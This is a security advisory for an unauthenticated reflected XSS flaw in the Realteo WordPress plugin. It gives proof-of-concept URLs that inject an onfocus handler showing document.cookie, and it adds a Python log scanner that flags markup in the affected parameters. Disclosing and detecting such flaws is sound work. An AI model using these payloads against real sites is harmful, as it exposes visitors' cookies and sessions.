Realteo < 1.2.4 - Unauthenticated Reflected Cross-Site Scripting (XSS)
Description
The plugin, used by the Findeo Theme, did not properly sanitise the keyword_search, search_radius, _bedrooms and _bathrooms GET parameters before outputting them in its properties page, leading to an unauthenticated reflected Cross-Site Scripting issue.
Proof of Concept
https://example.com/properties/?keyword_search=--!%3E%22%20autofocus%20onfocus=alert(`m0ze`);//%22
https://example.com/properties/?keyword_search=--!%3E%22%20autofocus%20onfocus=alert(document.cookie);//%22&search_radius=--!%3E%22%20autofocus%20onfocus=alert(document.cookie);//%22
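Detection sketch for the requests above, added here as an example (it is not part of the original advisory or the plugin's code): it URL-decodes the four affected parameters in web server access log lines and flags values that carry HTML markup. The log format (combined log format), the sample lines and the markup heuristic are assumptions made for this example.

```python
import re
from urllib.parse import urlsplit, parse_qs

# GET parameters named in the advisory.
AFFECTED_PARAMS = ("keyword_search", "search_radius", "_bedrooms", "_bathrooms")

# Heuristic (assumed for this example): characters that let a value break out
# of an HTML attribute or tag, or an inline event handler such as onfocus=.
MARKUP = re.compile(r'[<>"]|\bon[a-z]+\s*=', re.IGNORECASE)

# Request field of a combined-log-format line: "METHOD target HTTP/x.y"
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def suspicious_params(target):
    """Return {param: decoded value} for affected parameters carrying markup."""
    query = parse_qs(urlsplit(target).query, keep_blank_values=True)
    hits = {}
    for name in AFFECTED_PARAMS:
        for value in query.get(name, []):  # parse_qs already percent-decodes
            if MARKUP.search(value):
                hits[name] = value
    return hits

def scan(lines):
    """Return (line number, [flagged parameter names]) for each suspicious line."""
    findings = []
    for number, line in enumerate(lines, 1):
        match = REQUEST.search(line)
        if match:
            hits = suspicious_params(match.group(1))
            if hits:
                findings.append((number, sorted(hits)))
    return findings

# Constructed sample log lines; the query string of the second line is the
# proof-of-concept request from the advisory.
SAMPLE_LOG = [
    '203.0.113.7 - - [01/Jan/2021:10:00:00 +0000] "GET /properties/?keyword_search=garden&_bedrooms=3 HTTP/1.1" 200 5120',
    '203.0.113.9 - - [01/Jan/2021:10:00:05 +0000] "GET /properties/?keyword_search=--!%3E%22%20autofocus%20onfocus=alert(document.cookie);//%22&search_radius=--!%3E%22%20autofocus%20onfocus=alert(document.cookie);//%22 HTTP/1.1" 200 5300',
    '203.0.113.7 - - [01/Jan/2021:10:00:09 +0000] "GET /properties/?_bathrooms=2&search_radius=50 HTTP/1.1" 200 4980',
]

if __name__ == "__main__":
    for number, names in scan(SAMPLE_LOG):
        print(f"line {number}: markup in {', '.join(names)}")
```

A hit only shows that such a request was received; whether the markup was reflected unescaped depends on the installed plugin version (the advisory covers Realteo < 1.2.4).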